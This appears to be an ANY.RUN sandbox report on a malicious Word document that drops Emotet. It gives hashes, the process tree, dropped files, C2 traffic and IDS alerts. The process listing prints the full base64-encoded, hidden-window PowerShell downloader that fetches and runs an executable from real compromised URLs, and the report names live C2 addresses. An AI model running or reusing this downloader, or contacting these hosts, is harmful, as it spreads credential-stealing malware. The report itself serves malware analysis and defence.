analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

OJ0768300870CT.doc

Full analysis: https://app.any.run/tasks/087e3156-c3c2-421b-b251-ec11b9c570d3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 18, 2020, 01:55:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
stealer
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Qui., Author: Benjamin Pierre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 14:46:00 2020, Last Saved Time/Date: Fri Jan 17 14:46:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

7AAE07E6C6AF5BB097CF5FB2D5FCAA08

SHA1:

1DFDD85A053E8C6BB4591255510D5F5C62F10D0D

SHA256:

C8E3C592764CC931CA345B5FFD3EE60B6EA84F0BE12BA50CE6F1C33E9335C4CA

SSDEEP:

6144:c0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+vpvFIwl:c0E3dxtR/iU9mvUPvLIwl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 858.exe (PID: 3804)
      • serialfunc.exe (PID: 3304)
      • 858.exe (PID: 1328)
      • serialfunc.exe (PID: 2104)
      • serialfunc.exe (PID: 1584)
      • sfLm7IaJ.exe (PID: 3308)
      • serialfunc.exe (PID: 1800)
      • serialfunc.exe (PID: 1944)
      • sfLm7IaJ.exe (PID: 2356)
      • serialfunc.exe (PID: 1248)
      • serialfunc.exe (PID: 2904)
    • Emotet process was detected

      • 858.exe (PID: 3804)
      • sfLm7IaJ.exe (PID: 2356)
    • Connects to CnC server

      • serialfunc.exe (PID: 2104)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 2104)
    • EMOTET was detected

      • serialfunc.exe (PID: 2104)
    • Actions looks like stealing of personal data

      • serialfunc.exe (PID: 1944)
    • Stealing of credential data

      • serialfunc.exe (PID: 1944)
      • serialfunc.exe (PID: 1800)
  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 928)
    • Executed via WMI

      • Powershell.exe (PID: 928)
    • PowerShell script executed

      • Powershell.exe (PID: 928)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 928)
      • 858.exe (PID: 3804)
      • serialfunc.exe (PID: 2104)
      • sfLm7IaJ.exe (PID: 2356)
    • Starts itself from another location

      • 858.exe (PID: 3804)
      • serialfunc.exe (PID: 2104)
      • sfLm7IaJ.exe (PID: 2356)
    • Connects to server without host name

      • serialfunc.exe (PID: 2104)
    • Application launched itself

      • serialfunc.exe (PID: 2104)
      • serialfunc.exe (PID: 1248)
    • Creates files in the program directory

      • serialfunc.exe (PID: 2104)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2832)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2832)
      • serialfunc.exe (PID: 1800)
      • serialfunc.exe (PID: 1584)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Qui.
Subject: -
Author: Benjamin Pierre
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 14:46:00
ModifyDate: 2020:01:17 14:46:00
Pages: 2
Words: 4
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
13
Malicious processes
7
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start winword.exe no specs powershell.exe 858.exe no specs #EMOTET 858.exe serialfunc.exe no specs #EMOTET serialfunc.exe sflm7iaj.exe no specs serialfunc.exe serialfunc.exe no specs serialfunc.exe #EMOTET sflm7iaj.exe serialfunc.exe no specs serialfunc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\OJ0768300870CT.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
928Powershell -w hidden -en JABEAGoAZgBwAHoAdQB4AGkAawBiAD0AJwBVAHUAZgBqAHgAdABoAGwAZwBoACcAOwAkAEUAcgBpAGsAYwBvAHEAeQBpACAAPQAgACcAOAA1ADgAJwA7ACQAWQB2AGUAcABsAGEAbABpAGoAbwBlAHkAPQAnAFkAYQBqAHIAYwBvAGYAbwBxAHcAZQB0AGUAJwA7ACQAVABzAG4AZABqAHcAdAB5AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcgBpAGsAYwBvAHEAeQBpACsAJwAuAGUAeABlACcAOwAkAEMAdwBuAG4AdgBiAHkAdABzAHoAYgA9ACcASwBmAGEAbABjAHgAaQBrAHgAJwA7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAYgBDAGwASQBFAE4AdAA7ACQAVABuAG0AdABuAGcAcABhAGoAeQA9ACcAaAB0AHQAcAA6AC8ALwBuAGUAaQBsAHcAaQBsAGwAaQBhAG0AcwBvAG4ALgBjAGEALwBiAGEAYwBrAHUAcAAvAGsAeABXAEgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG4AZQB0AGsAYQBmAGUAbQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBhAGkAbgB0AC8AdABrAHUANwBhAHgALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHYAaQBiAGEAbQBhAHMAdABlAHIAYgBhAHQAYwBoAC4AYwBvAG0ALwBOAGUAdwBzAGwAZQB0AHQAZQByAC8AdQBhAHEAdABlAG0AeQAvACoAaAB0AHQAcABzADoALwAvAHAAaABvAGUAbgBpAHgAcwB0AG8AbgBlAGEAbgBkAGwAYQBtAGkAbgBhAHQAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFkANgA0AFUAbgBxADQAVAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABlAHgAYwBsAHUAYgBiAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAFYANABhAGoAeAAvACcALgAiAHMAcABgAEwAaQBUACIAKAAnACoAJwApADsAJABEAG8AawBmAGgAawByAHYAawB1AGgAcgA9ACcAWgB1AGEAaABxAHMAYgBqAGEAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBsAGcAZwBnAGQAYwB5ACAAaQBuACAAJABUAG4AbQB0AG4AZwBwAGEAagB5ACkAewB0AHIAeQB7ACQATwBpAGgAaABuAGsAYgBhAGcAYQBkAGwAbgAuACIARABgAE8AVwBgAE4ATABPAEEAZABGAGAASQBsAGUAIgAoACQAVwBsAGcAZwBnAGQAYwB5ACwAIAAkAFQAcwBuAGQAagB3AHQAeQByACkAOwAkAFQAcgBnAHMAZABmAGcAdABqAGcAcgBzAGwAPQAnAEYAdQBqAGQAbwBqAGEAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVABzAG4AZABqAHcAdAB5AHIAKQAuACIAbABFAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADIANgAxADgANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAdAAiACgAJABUAHMAbgBkAGoAdwB0AHkAcgApADsAJABYAHMAdABuAGcAdgBsAHIAYQA9ACcAUgBiAGsAeABiAHMAZABoAHYAaQBsAHYAJwA7AGIAcgBlAGEAawA7ACQAQQB2AGwAdABuAGQAawBiAHgAagBiAD0AJwBLAHcAYQBxAGcAcgBjAHMAYgBkAG0AegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGcAeQBsAHcAZQB3AGcAYQB6AHkAbQBsAD0AJwBFAGEAdgBsAHkAcwBrAHYAcwBlAGUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1328"C:\Users\admin\858.exe" C:\Users\admin\858.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3804--e90241f9C:\Users\admin\858.exe
858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3304"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe858.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
2104--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3308"C:\ProgramData\sfLm7IaJ.exe"C:\ProgramData\sfLm7IaJ.exeserialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
1944"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" /scomma "C:\Users\admin\AppData\Local\Temp\7104.tmp"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
1584"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\7105.tmp"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exeserialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
1800"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\7125.tmp"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
Total events
2 508
Read events
1 626
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
3
Text files
1
Unknown types
8

Dropped files

PID
Process
Filename
Type
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDE88.tmp.cvr
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF211436F891CF7B2B.TMP
MD5:
SHA256:
928Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H3SLTG9D3FIO8HAKV3NK.temp
MD5:
SHA256:
1584serialfunc.exeC:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp
MD5:
SHA256:
1584serialfunc.exeC:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
MD5:
SHA256:
1584serialfunc.exeC:\Users\admin\Documents\Outlook Files\[email protected]
MD5:
SHA256:
1800serialfunc.exeC:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
MD5:
SHA256:
1800serialfunc.exeC:\Users\admin\Documents\Outlook Files\[email protected]
MD5:
SHA256:
928Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2832WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F5743C90D1A676FAE81742B0CF2FDF3F
SHA256:F4E39BE12C32DD01520D4D30C3D5B834E87CD3F96667AA40FA6B99FA66DDB625
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
serialfunc.exe
POST
91.236.4.234:443
http://91.236.4.234:443/IiD5Ld9
PL
malicious
2104
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/T2fQZk
US
binary
2.04 Mb
malicious
2104
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/IiD5Ld9
US
binary
148 b
malicious
2104
serialfunc.exe
POST
200
91.236.4.234:443
http://91.236.4.234:443/IiD5Ld9
PL
binary
148 b
malicious
2104
serialfunc.exe
POST
91.236.4.234:443
http://91.236.4.234:443/FR15wnHHJSTPHPqc
PL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
928
Powershell.exe
208.91.198.220:80
neilwilliamson.ca
PDR
US
malicious
2104
serialfunc.exe
91.236.4.234:443
FHU Climax Rafal Kraj
PL
malicious

DNS requests

Domain
IP
Reputation
neilwilliamson.ca
  • 208.91.198.220
suspicious

Threats

PID
Process
Class
Message
928
Powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
928
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
928
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
928
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2104
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
2104
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
2104
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2104
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2104
serialfunc.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2104
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
No debug info